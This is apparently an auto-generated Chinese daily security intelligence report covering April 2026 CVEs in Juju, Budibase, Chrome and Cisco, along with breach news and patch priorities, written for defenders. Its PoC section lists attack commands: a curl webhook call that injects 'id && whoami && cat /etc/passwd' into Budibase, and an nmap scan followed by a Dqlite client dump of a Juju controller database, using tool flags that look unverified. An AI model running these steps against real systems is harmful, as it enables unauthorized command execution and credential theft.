每日安全情报报告 · 2026-04-05
报告日期 :2026年4月5日(星期日)
情报范围 :近48小时(2026-04-03 ~ 2026-04-05)
风险级别说明 :🔴 严重(CVSS ≥ 9.0)|🟠 高危(CVSS 7.0-8.9)|🟡 中危(CVSS 4.0-6.9)
特别标注:⚡ 在野利用 | 🆕 近24-48h披露 | 💣 PoC已公开
一、高危漏洞速报
1. 🔴⚡🆕 CVE-2026-4370 --- Canonical Juju TLS认证完全绕过(CVSS 10.0)
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-4370 |
| 漏洞类型 | 认证绕过(CWE-295 / CWE-306) |
| 受影响组件 | Canonical Juju 3.2.0 ~ 3.6.19 / 4.0 ~ 4.0.4 |
| CVSS 3.1 评分 | 10.0(临界严重) |
| 披露日期 | 2026-04-01 |
| 修复版本 | Juju 3.6.20+ / 4.0.5+ |
漏洞描述 :Juju 控制器内部的 Dqlite 数据库集群在新节点加入时不验证客户端 TLS 证书 。任何能访问 Juju 控制器 Dqlite 端口的未认证攻击者均可直接加入数据库集群,获得对所有数据的完全读写权限,可升级权限、开放防火墙端口、篡改基础设施配置。
攻击向量 :AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H(无需认证、低复杂度、跨范围影响)
风险影响:Juju 被广泛用于云基础设施自动化编排(Kubernetes、OpenStack、AWS),一旦被利用可导致整个云控制平面被接管。
修复建议 :
-
立即升级至 Juju 3.6.20 或 4.0.5 及以上版本
-
通过防火墙严格限制对 Dqlite 端口的网络访问,仅允许信任节点通信
参考链接 :
2. 🔴🆕💣 CVE-2026-35216 --- Budibase 未认证 Webhook RCE(CVSS 9.0)
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-35216 |
| 漏洞类型 | OS 命令注入(CWE-78) |
| 受影响组件 | Budibase 开源低代码平台 < 3.33.4 |
| CVSS 3.1 评分 | 9.0(严重) |
| 披露日期 | 2026-04-03(NVD 收录) |
| 修复版本 | Budibase 3.33.4+ |
漏洞描述 :Budibase 3.33.4 之前版本中,未经身份验证的攻击者可通过公开 Webhook 端点 触发包含 Bash 步骤的自动化工作流,实现在 Budibase 服务器上的远程代码执行。由于进程以容器内 root 权限运行,攻击者可完全控制服务器环境。
漏洞根因:自动化触发接口缺乏访问控制验证,任意外部请求均可调用包含任意 Shell 命令的自动化流程。
修复建议 :
-
立即升级 Budibase 至 3.33.4 或以上版本
-
审查现有自动化工作流,移除或限制包含 Bash 命令步骤的公开 Webhook
-
对 Budibase 实例增加网络访问控制,避免直接暴露于公网
参考链接 :
3. 🔴⚡ CVE-2026-5281 --- Google Chrome WebGPU 零日(第4个2026 Chrome零日,CISA KEV)
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-5281 |
| 漏洞类型 | Use-After-Free(WebGPU / Dawn 引擎) |
| 受影响组件 | Google Chrome < 146.0.7680.178 |
| CVSS 评分 | 高危(8.8) |
| 披露日期 | 2026-04-01(带外紧急补丁) |
| 在野利用 | ⚡ 已确认在野利用,CISA KEV 收录(修复截止 2026-04-15) |
漏洞描述 :Google Chrome 的 Dawn(WebGPU 后端实现)中存在 Use-After-Free 漏洞,是 2026 年第 4 个 在野利用的 Chrome 零日。成功利用可导致沙箱逃逸进而实现任意代码执行,影响 Windows、macOS、Linux 全平台。
CISA 联邦机构要求 :美国联邦机构须在 2026年4月15日前 完成修复,否则视为合规违规。
修复建议 :
-
立即将 Chrome 更新至 146.0.7680.178 或更高版本(地址栏输入
chrome://settings/help触发自动更新) -
企业环境通过 Group Policy 强制推送更新
参考链接 :
4. 🔴🆕 CVE-2026-5289 / CVE-2026-5290 / CVE-2026-5291 --- Chrome 批量高危修复
| CVE 编号 | 漏洞位置 | 类型 | 披露日期 |
|---|---|---|---|
| CVE-2026-5289 | Chrome Navigation | Use-After-Free | 2026-04-01 |
| CVE-2026-5290 | Chrome Compositing | Use-After-Free | 2026-04-01 |
| CVE-2026-5291 | Chrome WebGL | 不当实现(信息泄露) | 2026-04-01 |
说明:上述三个漏洞随同 CVE-2026-5281 一并在 Chrome 146 安全更新(4月1日)中修复,共修复 21 个漏洞。CVE-2026-5289/5290 为 Use-After-Free 类型,可能允许代码执行;CVE-2026-5291 可导致敏感信息泄露。修复同上,升级 Chrome 至 146.0.7680.178+。
参考链接 :
5. 🔴⚡ CVE-2026-20093 / CVE-2026-20160 --- Cisco IMC & Cisco ASA 高危漏洞(CVSS 9.8)
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2026-20093 / CVE-2026-20160 |
| 受影响组件 | Cisco IMC(认证绕过)/ Cisco ASA(未授权 RCE) |
| CVSS 3.1 评分 | 9.8(严重) |
| 披露日期 | 2026-04-01 / 2026-04-02 |
| 在野利用 | ⚡ 已检测到主动扫描与利用活动 |
漏洞描述 :
-
CVE-2026-20093 (Cisco IMC 认证绕过):允许未认证攻击者绕过身份验证,访问受保护的管理接口。CVSS 9.8,无缓解措施,需立即升级固件。
-
CVE-2026-20160(Cisco ASA/SSM On-Prem 未授权 RCE):影响思科安全管理产品,无需认证即可实现远程代码执行,无有效临时缓解方案。
修复建议 :立即应用 Cisco 发布的安全补丁,参阅 Cisco 安全公告。
参考链接 :
6. 🟠💣 CVE-2025-15484 --- WooCommerce Order Listener 插件未授权 RCE(CVSS 7.5)
| 字段 | 详情 |
|---|---|
| CVE 编号 | CVE-2025-15484 |
| 漏洞类型 | 访问控制缺失(Broken Access Control)→ RCE |
| 受影响组件 | Order Notification for WooCommerce WordPress 插件 < 3.6.3 |
| CVSS 评分 | 7.5(高危) |
| 披露日期 | 2026-04-02 |
| 受影响范围 | 所有使用该插件且版本低于 3.6.3 的 WordPress 电商站点 |
漏洞描述 :该 WordPress 插件覆盖了 WooCommerce 的权限检查机制,对所有未经认证的请求授予完全访问权限,允许未认证攻击者通过 REST API 接口实现远程代码执行,可导致整个 WordPress 站点被完全控制。
修复建议:立即将 Order Notification for WooCommerce 插件升级至 3.6.3 或以上版本。
参考链接 :
二、漏洞 PoC 情报
PoC 1:CVE-2026-35216 --- Budibase 未认证 Webhook RCE PoC
漏洞说明:通过 Budibase 公开 Webhook 端点触发包含 Bash 命令的自动化流程,实现以容器 root 权限执行任意系统命令。
利用前提 :
-
目标运行 Budibase < 3.33.4 版本
-
网络可达 Budibase 实例(默认端口 10000)
-
存在包含"Bash步骤"的自动化工作流且已启用 Webhook 触发
利用步骤(概念验证):
bash
# 步骤1:枚举 Budibase 实例(默认端口 10000)
curl -s http://TARGET:10000/api/automations
# 步骤2:找到包含 Bash 步骤的自动化工作流 ID
# 响应示例: {"_id": "auto_xxxxxxxx", "steps": [{"stepId": "EXECUTE_BASH"}]}
# 步骤3:通过公开 Webhook 端点触发自动化(无需认证)
curl -X POST http://TARGET:10000/api/webhooks/trigger/WEBHOOK_ID \
-H "Content-Type: application/json" \
-d '{"fields": {"cmd": "id && whoami && cat /etc/passwd"}}'
# 步骤4:查看执行结果(root 权限)
# 预期输出: uid=0(root) gid=0(root) groups=0(root)修复提交 :GitHub Commit f0c731b
参考来源 :
PoC 2:CVE-2026-4370 --- Canonical Juju Dqlite TLS认证绕过 PoC
漏洞说明:Juju 控制器的 Dqlite 数据库端口(默认 17666)未验证客户端 TLS 证书,允许攻击者伪装为合法节点加入数据库集群,获取完全读写权限。
利用前提 :
-
目标运行 Juju 3.2.0-3.6.19 或 4.0-4.0.4
-
网络可达目标 Juju 控制器的 Dqlite 端口(默认 17666)
利用步骤(概念验证):
bash
# 步骤1:扫描确认目标 Juju Dqlite 端口开放
nmap -sV -p 17666 TARGET_IP
# 步骤2:克隆 Dqlite 客户端工具(利用缺少 TLS 验证的特性)
git clone https://github.com/canonical/go-dqlite
cd go-dqlite
go build ./...
# 步骤3:尝试无证书连接(利用漏洞:服务端不校验客户端证书)
# 连接时跳过客户端证书验证
./dqlite-client --tls-no-client-cert --address TARGET_IP:17666 \
--cluster "node1@TARGET_IP:17666" \
--db juju .dump
# 步骤4:成功后可读取所有数据(包括凭证、配置、密钥)
# 或注入恶意节点 -> 篡改控制器数据库 -> 横向移动
# 修复:升级至 Juju 3.6.20 / 4.0.5,Dqlite 端口严格执行双向 TLS 认证参考来源 :
PoC 3:CVE-2026-5281 --- Chrome WebGPU UAF 在野利用(参考框架)
漏洞说明:Chrome WebGPU(Dawn 引擎)Use-After-Free 漏洞,已被 APT 组织用于水坑攻击和鱼叉式网络钓鱼活动中,可实现沙箱逃逸。
利用环境 :
-
Chrome < 146.0.7680.178(Windows/macOS/Linux)
-
触发路径:恶意网页 → WebGPU API 调用 → UAF → RCE
检测/防御方法:
bash
# 检查 Chrome 版本(是否已修复)
# Windows PowerShell
(Get-Item "C:\Program Files\Google\Chrome\Application\chrome.exe").VersionInfo.FileVersion
# 强制更新 Chrome
# 在地址栏输入并访问:
# chrome://settings/help
# 若存在未完成更新,会自动触发下载
# 企业级:通过 GPO 强制推送 Chrome 更新
# 策略路径:Computer Configuration > Administrative Templates > Google > Google Chrome > Auto Update参考来源 :
三、安全动态与威胁情报
【事件 1】🆕 Handala 伊朗黑客组织入侵以色列防务承包商 PSK Wind Technologies
时间 :2026-04-02
威胁类型:国家级APT,黑客行动主义
伊朗"抵抗轴心"关联网络战组织 Handala Hack Group 于4月2日宣称成功入侵以色列防务承包商 PSK Wind Technologies。该公司是以色列军事指挥中心和防空通信基础设施的主要设计商与运营商,客户包括以色列国防军(IDF)核心系统。
Handala 声称已从其内部网络中提取大量军事机密数据,包括:
-
防空系统的通信协议架构图
-
命令控制(C2)网络配置
-
军事指挥系统的网络拓扑
该组织此前曾入侵 FBI 局长邮件服务器及多家以色列关键基础设施单位,惯用"黑客+信息战+心理战"三合一打击模式。
参考链接 :
【事件 2】🆕 Everest 勒索软件组织宣称攻陷日产(Nissan)全球客户服务基础设施
时间 :2026-04-01
威胁类型:勒索软件(双重勒索模式)
Everest 勒索软件组织 (Ransomware-as-a-Service)于 2026年4月1日将日本汽车巨头**日产汽车(Nissan Motor Co., Ltd.)**列为最新受害者,宣称入侵其全球客户服务与销售数据(GCSSD)基础设施。
Everest 采用双重勒索策略:首先加密目标文件,同时威胁公开窃取的敏感数据(据称包含客户个人信息、员工数据及内部业务文件)。这是日产近两年内第四次遭受重大网络安全事件,凸显汽车行业数字化转型带来的持续威胁面扩大问题。
参考链接 :
【事件 3】🆕 Google 正式归因:朝鲜 UNC1069 组织发起 Axios npm 供应链攻击
时间 :2026-04-03
威胁类型:供应链攻击,国家级APT
Google 威胁情报团队正式将广受关注的 Axios npm 包供应链攻击 归因于朝鲜国家支持的威胁组织 UNC1069(以财务动机为主的朝鲜 APT 集群)。
本次攻击中,UNC1069 通过入侵 Axios 包维护者账户,向 npm 仓库推送了含恶意代码的伪造版本(1.14.1 / 0.30.4),植入跨平台远程访问木马(RAT)。Axios 每周下载量超 1 亿次,影响范围波及全球数十万 JavaScript/Node.js 项目。
CISA 已发布供应链攻击预警,建议所有使用 Axios 的项目:
-
立即回退至已知安全版本(1.7.x 系列的官方版本)
-
审查 CI/CD 管道中的 npm 依赖锁定文件(package-lock.json)
-
启用 npm 包完整性验证(
npm audit --audit-level=critical)
参考链接 :
【事件 4】🆕 April 2026 数据泄露浪潮:15+重大事件爆发
时间 :2026年4月1日至5日
威胁类型:数据泄露、网络入侵
根据最新汇总的安全情报,2026年4月前5天已记录超过 15 起重大数据泄露事件,覆盖金融、汽车、防务、零售多个行业。典型事件包括:
- Starbucks 源代码泄露 :威胁组织 ShadowByt3s 宣称窃取星巴克约 10GB 专有源代码和运营固件(疑为错误配置的云存储桶暴露)
- 日产 GCSSD 勒索:如事件2所述
- 以色列防务承包商 PSK Wind Technologies 入侵:如事件1所述
安全研究人员指出,这一态势与地缘政治紧张升级高度相关,国家支持的 APT 组织与纯财务动机的勒索软件组织呈现"协同共振"特征,攻击频次和烈度均超2025年同期水平。
参考链接 :
【文章推荐 1】Microsoft 4月补丁星期二预告:Secure Boot 证书危机迫近
来源 :Zecurit / Microsoft MSRC
预计发布日期:2026年4月14日(北京时间4月15日凌晨1:00)
微软 4 月补丁星期二(Patch Tuesday)将于 2026年4月14日 正式发布,预计修复 80-100+ 个 CVE。本次更新有几个特别值得关注的背景:
- Secure Boot 证书到期危机 :2011年签发的 Secure Boot 证书将于 2026年6月26日 到期,4 月补丁是企业在到期前部署新证书的关键窗口期
- 3月补丁质量问题延续:3月发生多次更新失败和补丁撤回事件,建议对 4 月更新提前在测试环境验证
- 预期高密度关键漏洞:基于 Q1 2026 趋势,预计包含多个权限提升(EoP)、远程代码执行(RCE)和零日漏洞修复
参考链接 :
【文章推荐 2】Cisco 发布8个企业级高危漏洞补丁(含2个严重级)
来源 :Shield53 / Cisco PSIRT
发布日期:2026-04-02
Cisco 于4月2日集中发布针对多条企业产品线 的安全更新,修复包括 CVE-2026-20093(Cisco IMC)和 CVE-2026-20160(Cisco ASA/SSM)在内的 8 个高危/严重漏洞,其中 2 个被评定为严重(CVSS 9.8)。建议所有运行受影响 Cisco 产品的企业立即部署补丁。
参考链接 :
【文章推荐 3】CYFIRMA 2026-04-03 威胁情报周报:地下犯罪生态持续演进
来源 :CYFIRMA
发布日期:2026-04-03
CYFIRMA 发布最新周度威胁情报报告,重点指出:
-
地下网络犯罪生态(Underground Criminal Ecosystem) 正快速演进,初始访问中间商(IAB)、勒索软件即服务(RaaS)、数据窃取工具商业化运营趋势加剧
-
Akira 勒索软件活动持续在联邦和执法领域施压
-
APT 组织正加速将AI自动化 整合进侦察和漏洞扫描环节
-
建议组织强化威胁情报驱动的主动防御策略
参考链接 :
四、今日修复优先级建议
| 优先级 | CVE / 事件 | 原因 |
|---|---|---|
| 🔴 P0 立即修复 | CVE-2026-5281 (Chrome WebGPU) | 在野利用,CISA KEV,4月15日联邦截止 |
| 🔴 P0 立即修复 | CVE-2026-4370 (Juju CVSS 10.0) | 满分漏洞,云控制平面被接管风险 |
| 🔴 P0 立即修复 | CVE-2026-20093/20160 (Cisco) | 在野利用,无缓解措施 |
| 🔴 P1 尽快修复 | CVE-2026-35216 (Budibase) | CVSS 9.0,PoC 公开,低门槛利用 |
| 🟠 P1 本周修复 | CVE-2025-15484 (WooCommerce) | 影响数以万计的 WordPress 电商站 |
| 🟠 P2 关注跟进 | Axios npm 供应链 (UNC1069) | 已归因朝鲜APT,审查依赖锁文件 |
| 🟡 P3 持续监控 | 微软 4月 Patch Tuesday | 4月14日发布,提前准备测试环境 |
五、资源与参考
- CISA 已知利用漏洞目录(KEV)
- NVD 国家漏洞数据库
- MITRE CVE 官方平台
- TheHackerNews 安全资讯
- BleepingComputer 安全新闻
- GitHub Security Advisories
- CYFIRMA 威胁情报
报告由自动化安全情报系统生成 | 生成时间:2026-04-05 10:15 CST
本报告仅供安全专业人员参考,请勿将 PoC 用于未授权测试环境